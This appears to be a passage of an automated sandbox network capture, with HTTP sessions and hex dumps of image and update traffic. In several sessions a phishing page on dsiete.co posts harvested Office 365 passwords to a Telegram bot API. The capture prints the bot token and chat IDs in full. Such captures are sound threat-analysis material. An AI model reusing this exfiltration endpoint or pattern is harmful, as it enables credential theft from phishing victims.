                                            2024-12-03 08:57:05 UTC3715INData Raw: ff d8 ff e1 0c af 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 b0 00 00 01 01 00 03 00 00 00 01 02 c5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 31 3a 32 31 20 31 33 3a 34 31 3a 34 32 00 00 00 00 04 90 00 00 07 00
                                            Data Ascii: ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2020:01:21 13:41:42
                                            2024-12-03 08:57:05 UTC4096INData Raw: 6f 6f 6c 00 00 00 00 00 49 6e 74 72 62 6f 6f 6c 00 00 00 00 00 42 63 6b 67 4f 62 6a 63 00 00 00 01 00 00 00 00 00 00 52 47 42 43 00 00 00 03 00 00 00 00 52 64 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 47 72 6e 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 6c 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 72 64 54 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 42 6c 64 20 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 52 73 6c 74 55 6e 74 46 23 50 78 6c 40 52 00 00 00 00 00 00 00 00 00 0a 76 65 63 74 6f 72 44 61 74 61 62 6f 6f 6c 01 00 00 00 00 50 67 50 73 65 6e 75 6d 00 00 00 00 50 67 50 73 00 00 00 00 50 67 50 43 00 00 00 00 4c 65 66 74 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 54
                                            Data Ascii: oolIntrboolBckgObjcRGBCRd doub@oGrn doub@oBl doub@oBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@RvectorDataboolPgPsenumPgPsPgPCLeftUntF#RltT
                                            2024-12-03 08:57:05 UTC4096INData Raw: a0 ed 44 01 cd 73 40 de e8 74 ff 00 81 82 d4 c6 a6 8d c1 c1 c4 ee 30 07 a3 a9 9e df d5 4a 95 c5 e0 16 73 ec 2e 6d 5b 9f c8 70 77 ae c9 d7 8f cc f7 26 0e 79 61 6b ad 76 e2 75 fd 61 92 23 fb 0a 67 d5 27 f3 c1 03 48 35 6b ff 00 99 24 e6 17 cf f3 8d 2d 12 5e 0d 5e ed 7c 12 57 13 12 6e 0d 24 5e e0 e2 3d ad 37 b2 23 f7 be 8a b4 ca 29 79 6b 5b 9b 61 7f 30 2c 6c 9e ff 00 ba ab 92 f7 06 90 5c e0 75 12 6a 11 0a d5 38 b6 3b d3 b9 b7 16 0d 09 66 d6 13 1f bb bd a3 fe a5 25 59 6e a4 92 49 21 05 9f cf b5 01 ad ab 7d c3 ec ae 1f a4 92 7f 7c 91 fc e8 d5 1e cf e7 da 99 f9 15 d6 4b 5e 48 8e fb 4c 7c 8a 4a 63 55 75 0b 25 b4 1a c8 e1 e7 8f ca 87 d6 3f e4 7c ff 00 fc 2d 77 fd 43 91 3e d9 8f fb c7 98 fa 25 57 ea d6 b6 ce 8f d4 36 ce 98 d7 72 08 ff 00 06 ef 14 94 ff 00 ff d4 f4
                                            Data Ascii: Ds@t0Js.m[pw&yakvua#g'H5k$-^^|Wn$^=7#)yk[a0,l\uj8;f%YnI!}|K^HL|JcUu%?|-wC>%W6r
                                            2024-12-03 08:57:05 UTC4096INData Raw: 0e 41 64 6f 62 65 00 64 40 00 00 00 01 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 02 02 02 02 02 02 02 02 02 02 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 01 01 01 01 02 02 01 02 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 ff c0 00 11 08 02 86 04 b0 03 01 11 00 02 11 01 03 11 01 ff dd 00 04 00 96 ff c4 01 a2 00 00 00 06 02 03 01 00 00 00 00 00 00 00 00 00 00 07 08 06 05 04 09 03 0a 02 01 00 0b 01 00 00 06 03 01 01 01 00 00 00 00 00 00 00 00 00 06 05 04 03 07 02 08 01 09 00 0a 0b 10 00 02 01 03 04 01 03 03 02 03 03 03 02 06 09 75 01 02 03 04
                                            Data Ascii: Adobed@u
                                            2024-12-03 08:57:05 UTC4096INData Raw: 82 93 6f 42 36 20 b7 4e 18 5e c6 4c 8c e8 ab 28 6b 90 38 6f ad fd b1 73 b2 98 50 92 bd 3d 6d bc 09 58 0a e3 a1 ff 00 03 96 8e 68 11 99 87 20 1f 61 4b ab 7d 0c 45 3a 14 db 4f a9 41 af 4b 7a 79 e3 90 0b 5b d9 7b 29 1d 18 2b 03 d7 55 ac b1 c4 ee bf ea 49 ff 00 63 ee 9d 39 d1 6f ec 0d df 2e 2c 4b a5 88 d2 5b f3 6f eb fe c7 df ba f7 45 a2 b7 b7 ea 22 a8 65 32 9f d5 6f a9 fe bf 8f 7e eb dd 2f 76 6f 65 d4 64 2a 23 52 e4 ea 61 f9 3c 1e 0f e6 fe fd d7 ba 38 3b 5e b4 d6 d3 c6 e7 9b a8 e7 fd 85 ff 00 de 3d fb af 74 ad 95 00 17 b5 bf df 5f df ba f7 5c 61 40 dc da ff 00 ef ad ef dd 7b a6 ac d5 40 a5 81 db e8 40 bf fb 61 fd 7e 9e fd d7 ba 2b 9b cb 7f b6 3e 79 11 64 b5 89 1f 5b 7d 0f fb 6f 7e eb dd 07 30 76 a4 8f 30 5f 2f d0 8f cf f5 f7 ee bd d0 f1 b1 b7 71 c9 f8 c1 7d
                                            Data Ascii: oB6 N^L(k8osP=mXh aK}E:OAKzy[{)+UIc9o.,K[oE"e2o~/voed*#Ra<8;^=t_\a@{@@a~+>yd[}o~0v0_/q}
                                            2024-12-03 08:57:05 UTC4096INData Raw: af 75 0d 45 9f 57 e3 8f f8 8f f8 a7 bf 75 ee a7 02 0a 81 fe c3 de 8f 5a 27 87 49 1d c3 89 5c 8d 3c 91 b2 df 50 3f ef 5e d6 da dc 18 1d 48 3d 20 bb 80 4c 85 48 e8 a9 6e 8e 97 a6 c8 57 9a 8f b7 04 97 d5 fa 07 f5 bf f4 f6 38 b3 e6 69 22 8b 47 89 e5 d0 22 ef 97 92 49 35 e8 e8 4d eb fd 87 1e 09 63 55 88 2d ad f8 b7 d3 d9 26 eb ba 1b aa 92 d5 e8 ef 6c db 05 bd 00 1d 18 2a 54 f1 c6 ab f8 02 de c2 92 1a 92 7a 14 46 94 14 e9 b7 2f 49 f7 10 ba d8 1b 82 3f d7 f7 e0 3d 7a 73 a0 17 70 6d 62 67 69 16 3b fd 4f d0 fb b7 5e e9 3d 0e df 72 c1 3c 56 fa 03 c7 fb ef af bf 75 ee 85 2d ad 82 34 e5 1b 46 9f a7 e3 f3 c0 ff 00 78 f7 ee bd d0 b4 90 81 08 5b 7e 2d fe f1 ff 00 1a f7 ee bd d0 75 ba 70 02 b9 1f d3 c9 ff 00 0f f0 3f d3 df ba f7 40 8d 66 ca 9f cc 74 c6 4f 26 e4 0f c5 fd
                                            Data Ascii: uEWuZ'I\<P?^H= LHnW8i"G"I5McU-&l*TzF/I?=zspmbgi;O^=r<Vu-4Fx[~-up?@ftO&
                                            2024-12-03 08:57:05 UTC4096INData Raw: 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b ef dd 7b af 7d 92 7f 4f f7 af f8 af bf 75 ee bd f6 49 fd 3f de bf e2 be fd d7 ba f7 d9 27 f4 ff 00 7a ff 00 8a fb f7 5e eb df 64 9f d3 fd eb fe 2b
                                            Data Ascii: ^d+{}OuI?'z^d+{}OuI?'z^d+{}OuI?'z^d+{}OuI?'z^d+{}OuI?'z^d+
                                            2024-12-03 08:57:05 UTC4096INData Raw: d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e eb de fd d7 ba f7 bf 75 ee bd ef dd 7b af 7b f7 5e e9 8b 34 74 d3 c8 47 e1 7f e2 3d fb af 74 54 37 ee 5d e9 e4 93 4b db 93 7f f7 9f 7e eb dd 04 14 bb 82 49 6a 74 eb 36 d5 fd 4f bf 75 ee 85 9c 2c ed 34 6a c4 fd 6d
                                            Data Ascii: u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^u{{^4tG=tT7]K~Ijt6Ou,4jm
                                            2024-12-03 08:57:05 UTC4096INData Raw: b8 b5 bf af b5 c0 d4 74 13 65 d2 69 d6 33 97 84 1b 6b 1f f2 57 fc 6f de ba d7 59 d3 27 09 17 d6 3f db ff 00 5f f7 9f 7e eb dd 72 39 48 05 fd 6a 3f d8 f3 fe f3 ef dd 7b ae 1f c5 69 cf fb b0 7f b7 5f 76 a7 d9 d7 ba e3 2e 56 15 17 0e 3e 84 f0 47 fb c7 ba f5 ee 9a a4 dc b4 d1 b6 93 28 bf f8 9f 7a eb 74 f5 eb 8a ee 7a 53 fe ed 5f f6 e3 fe 2b ef d4 f9 75 e3 f2 ea 6c 19 b8 67 36 57 06 ff 00 4e 7f e2 9e f7 4e bd 4e 9f 62 95 65 50 41 f7 ee b5 d6 5f 7e eb dd 7b df ba f7 5e f7 ee bd d7 bd fb af 75 ef 7e eb dd 7b df ba f7 5e 3f 43 ef dd 7b a0 93 b4 3f e2 c3 5d ff 00 2c 25 ff 00 a1 4f b7 54 64 74 d4 9c 3a d3 13 f9 b1 8f dc cc dc 7f 6a a3 fd b7 ab d9 dd 99 c0 e8 86 f0 e0 e7 af ff d4 de d3 3d 0b 4b 4f 20 5b dc 86 fc 7d 07 fc 6f df ba f7 45 27 7a ed da e9 ea 65 31 a3 1f
                                            Data Ascii: tei3kWoY'?_~r9Hj?{i_v.V>G(ztzS_+ulg6WNNNbePA_~{^u~{^?C{?],%OTdt:j=KO [}oE'ze1
                                            2024-12-03 08:57:05 UTC4096INData Raw: c6 9d 35 e2 7b 2a 8e 66 01 a7 4f af 3e a1 fe c7 f3 ee e0 57 a6 c3 54 fc fa 5a 45 be 71 ec 07 ef a7 fc 94 3f e2 be e8 cb d3 cb e5 d7 53 6f 9a 00 3f cf a7 fc 94 3f e2 be fc 01 eb 75 35 e9 07 9b ec aa 3a 62 6d 50 9c 7d 2c c3 de c5 7a f6 aa 75 87 0f d9 d4 75 0c 01 a8 5e 7e be a1 ff 00 15 f7 7d 38 ea 81 ea 7a 5c c5 bf 68 0a df ce 9f 4f f5 43 de 80 ea fc 47 52 e1 df 34 52 30 51 3a 1f a7 f6 87 b7 74 f5 b0 31 d3 c0 dc 70 49 11 75 90 1b 0b fd 7d e8 8c 75 ee 83 3c ff 00 60 c3 41 31 4f 28 16 36 fd 40 7f be bf ba f5 ee b9 e1 fb 16 92 a2 da a7 53 7f f6 a1 fe df df ba f7 4a d3 be a8 44 77 f3 a7 f5 fd 43 fd f7 d3 de ba d5 7a 6a 93 b1 68 51 ca 99 d7 fe 4a 1f f1 5f 7e 06 bd 6f a9 d4 fb fe 81 80 fd f4 e4 7f aa 1f f1 5f 76 a7 5e ea 59 df 94 1f f1 dd 3f e4 a1 ef 78 f4 ea a4
                                            Data Ascii: 5{*fO>WTZEq?So??u5:bmP},zuu^~}8z\hOCGR4R0Q:t1pIu}u<`A1O(6@SJDwCzjhQJ_~o_v^Y?x


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.44975120.12.23.50443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:04 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7ynDvC4mr7YoCCl&MD=csyhD7yf HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                            Host: slscr.update.microsoft.com
                                            2024-12-03 08:57:05 UTC560INHTTP/1.1 200 OK
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            Content-Type: application/octet-stream
                                            Expires: -1
                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                            MS-CorrelationId: 752ccd2a-4406-4580-b19d-d1b0c6c55c48
                                            MS-RequestId: 6bb657d7-cf69-4b63-825a-45e8d7bc1fdf
                                            MS-CV: auoMcogfDkO9403r.0
                                            X-Microsoft-SLSClientCache: 2880
                                            Content-Disposition: attachment; filename=environment.cab
                                            X-Content-Type-Options: nosniff
                                            Date: Tue, 03 Dec 2024 08:57:04 GMT
                                            Connection: close
                                            Content-Length: 24490
                                            2024-12-03 08:57:05 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                            2024-12-03 08:57:05 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.449756173.254.24.564433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:04 UTC344OUTGET /favicon.ico HTTP/1.1
                                            Host: dsiete.co
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:05 UTC304INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:05 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Mon, 28 Jan 2019 16:36:43 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 43
                                            Cache-Control: max-age=604800
                                            Expires: Tue, 10 Dec 2024 08:57:05 GMT
                                            Content-Type: image/x-icon
                                            2024-12-03 08:57:05 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 01 07 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                            Data Ascii: GIF89a!,L;


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.449761149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:26 UTC564OUTOPTIONS /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            Accept: */*
                                            Access-Control-Request-Method: POST
                                            Access-Control-Request-Headers: cache-control,content-type
                                            Origin: https://dsiete.co
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Dest: empty
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:27 UTC359INHTTP/1.1 204 No Content
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:57:26 GMT
                                            Connection: close
                                            Access-Control-Max-Age: 86400
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Allow-Headers: cache-control,content-type
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.449762149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:28 UTC672OUTPOST /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            Content-Length: 291
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            Accept: */*
                                            Content-Type: application/json
                                            cache-control: no-cache
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Origin: https://dsiete.co
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:28 UTC291OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 35 39 34 37 33 33 39 38 37 36 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 3d 3d 3d 20 4f cd 8f 33 cd 8f 36 cd 8f 35 cd 8f 20 52 cd 8f 65 cd 8f 73 cd 8f 75 cd 8f 6c cd 8f 74 cd 8f 20 3d 3d 3d 3d 3d 3d 5c 72 5c 6e 45 6d 61 69 6c 3a 20 5c 72 5c 6e 50 61 73 73 77 6f 72 64 31 3a 20 72 33 78 6f 37 28 6a 58 36 69 6c 2c 5c 72 5c 6e 49 50 3a 20 68 74 74 70 73 3a 2f 2f 69 70 2d 61 70 69 2e 63 6f 6d 2f 38 2e 34 36 2e 31 32 33 2e 32 32 38 5c 72 5c 6e 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65
                                            Data Ascii: {"chat_id":5947339876,"text":"====== O365 Result ======\r\nEmail: \r\nPassword1: r3xo7(jX6il,\r\nIP: https://ip-api.com/8.46.123.228\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
                                            2024-12-03 08:57:29 UTC388INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:57:28 GMT
                                            Content-Type: application/json
                                            Content-Length: 708
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-12-03 08:57:29 UTC708INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 36 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 33 38 35 31 38 36 30 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 77 69 7a 7a 7a 69 65 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 7a 7a 7a 69 65 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 34 37 33 33 39 38 37 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 2e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 57 69 7a 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6d 6d 69 65 77 69 7a 7a 69 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 31 36 32 34 38 2c 22 74 65
                                            Data Ascii: {"ok":true,"result":{"message_id":9698,"from":{"id":6385186008,"is_bot":true,"first_name":"wizzzie_bot","username":"wizzzie_bot"},"chat":{"id":5947339876,"first_name":"S.","last_name":"Wiz","username":"sammiewizzie","type":"private"},"date":1733216248,"te


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.449763149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:30 UTC401OUTGET /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:31 UTC346INHTTP/1.1 400 Bad Request
                                            Server: nginx/1.18.0
                                            Date: Tue, 03 Dec 2024 08:57:31 GMT
                                            Content-Type: application/json
                                            Content-Length: 80
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-12-03 08:57:31 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.449764149.154.167.2204433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:38 UTC672OUTPOST /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: keep-alive
                                            Content-Length: 291
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            Accept: */*
                                            Content-Type: application/json
                                            cache-control: no-cache
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Origin: https://dsiete.co
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:38 UTC291OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 35 39 34 37 33 33 39 38 37 36 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 3d 3d 3d 20 4f cd 8f 33 cd 8f 36 cd 8f 35 cd 8f 20 52 cd 8f 65 cd 8f 73 cd 8f 75 cd 8f 6c cd 8f 74 cd 8f 20 3d 3d 3d 3d 3d 3d 5c 72 5c 6e 45 6d 61 69 6c 3a 20 5c 72 5c 6e 50 61 73 73 77 6f 72 64 31 3a 20 6c 6a 5d 71 3c 62 4a 54 28 6f 76 21 5c 72 5c 6e 49 50 3a 20 68 74 74 70 73 3a 2f 2f 69 70 2d 61 70 69 2e 63 6f 6d 2f 38 2e 34 36 2e 31 32 33 2e 32 32 38 5c 72 5c 6e 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65
